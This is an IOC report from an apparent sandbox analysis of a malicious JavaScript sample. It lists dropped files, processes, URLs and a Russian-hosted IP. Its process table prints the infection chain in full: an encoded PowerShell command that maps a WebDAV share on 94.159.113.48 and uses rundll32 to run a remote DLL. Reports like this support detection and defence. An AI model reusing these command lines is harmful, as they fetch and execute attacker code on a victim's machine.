IOC Report
634624051181209037.js

Files

File Path | Type | Category | Malicious
634624051181209037.js | ASCII text, with very long lines (65536), with no line terminators | initial sample | malicious
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | data | dropped |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ptl4kggm.me0.psm1 | ASCII text, with no line terminators | dropped |
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qnf1x5ra.alu.ps1 | ASCII text, with no line terminators | dropped |

Processes

Path | Cmdline | Malicious
C:\Windows\System32\wscript.exe | C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\634624051181209037.js" | malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand bgBlAHQAIAB1AHMAZQAgAFwAXAA5ADQALgAxADUAOQAuADEAMQAzAC4ANAA4AEAAOAA4ADgAOABcAGQAYQB2AHcAdwB3AHIAbwBvAHQAXAAgADsAIAByAHUAbgBkAGwAbAAzADIAIABcAFwAOQA0AC4AMQA1ADkALgAxADEAMwAuADQAOABAADgAOAA4ADgAXABkAGEAdgB3AHcAdwByAG8AbwB0AFwAMwAxADgANQAyADIANQA4ADkAMAAxADAAMAAyADYALgBkAGwAbAAsAEUAbgB0AHIAeQA= | malicious
C:\Windows\System32\rundll32.exe | "C:\Windows\system32\rundll32.exe" \\94.159.113.48@8888\davwwwroot\318522589010026.dll,Entry | malicious
C:\Windows\System32\conhost.exe | C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
C:\Windows\System32\net.exe | "C:\Windows\system32\net.exe" use \\94.159.113.48@8888\davwwwroot\ |

URLs

Name | IP | Malicious
http://94.159.113.48:8888/U | unknown |
http://94.159.113.48:8888/pace | unknown |
https://aka.ms/pscore6 | unknown |
http://www.microsoft.2 | unknown |
https://aka.ms/pscore68 | unknown |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | unknown |
http://94.159.113.48:8888/ | unknown |
unknown

IPs

IP | Domain | Country | Malicious
94.159.113.48 | unknown | Russian Federation | malicious

Registry

Path | Value | Malicious
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe | JScriptSetScriptStateStarted |

Memdumps
